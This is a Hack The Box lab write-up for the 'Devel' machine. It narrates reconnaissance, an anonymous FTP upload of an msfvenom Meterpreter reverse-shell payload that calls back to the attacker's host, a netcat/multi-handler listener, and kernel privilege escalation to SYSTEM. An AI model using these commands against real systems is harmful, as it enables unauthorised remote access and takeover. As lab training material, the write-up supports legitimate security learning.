[HTB] Devel

Scanning with nmap

the nmap scan results show that ftp-anonymous login is allowed. alt text


I explored a directory but couldn’t find any useful info on the server. alt text


Because the http port 80 server is also open, I tried navigating to the address on Firefox. alt text


More information gathering

Then I tried gathering more information which really did not help much and that made me realize there was an easier way to go about this. Because the ftp server was open I could just generate a payload and run it on the webserver and pop the reverse shell. alt text

alt text

alt text


Generating a payload

I generated a reverse shell payload with msfvenom and the extension is .asp since we saw the extension on the ftp server.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f asp > reverse.aspx

alt text


uploaded the reverse shell that I generated onto the ftp server using the put command.

alt text


Before navigating to http://10.10.10.5/reverse.aspx, I had to start a netcat server to listen to the port by running the following command: nc -lvnp 1234


For some reason, my netcat listener kept crashing. As an alternative, I switched to msfconsole and utilized multi/handler to listen ports.

alt text


alt text


I was able to get the shell but the user was not the admin with low privileges that I couldn’t access many directories with the current user. As you could see from the picture below the getuid returned IIS APPPOOL\Web which is not the administrator. It was time to utilize the privilege escaltion to move vertically and gain access.

alt text


After some research, I learned that there exists a post module in meterpreter. So I backgrouned the current session and searched for the module. search type:post path:post/multi.

alt text

alt text


As the name of the exploit (local_exploit_suggester) implies it suggested many available exploits and I decided to use the 3rd exploit, which is exploit/windows/local/ms10_015_kitrap0d.

alt text


set the SESSION as 1, because the backgrouned session is the only session we have and set othe required options.

alt text


I succeeded in getting the root shell. getuid command returned NT AUTHORITY\SYSTEM, another name for root. alt text


found the user flag. alt text


found the root flag. alt text


alt text

#Hack The Box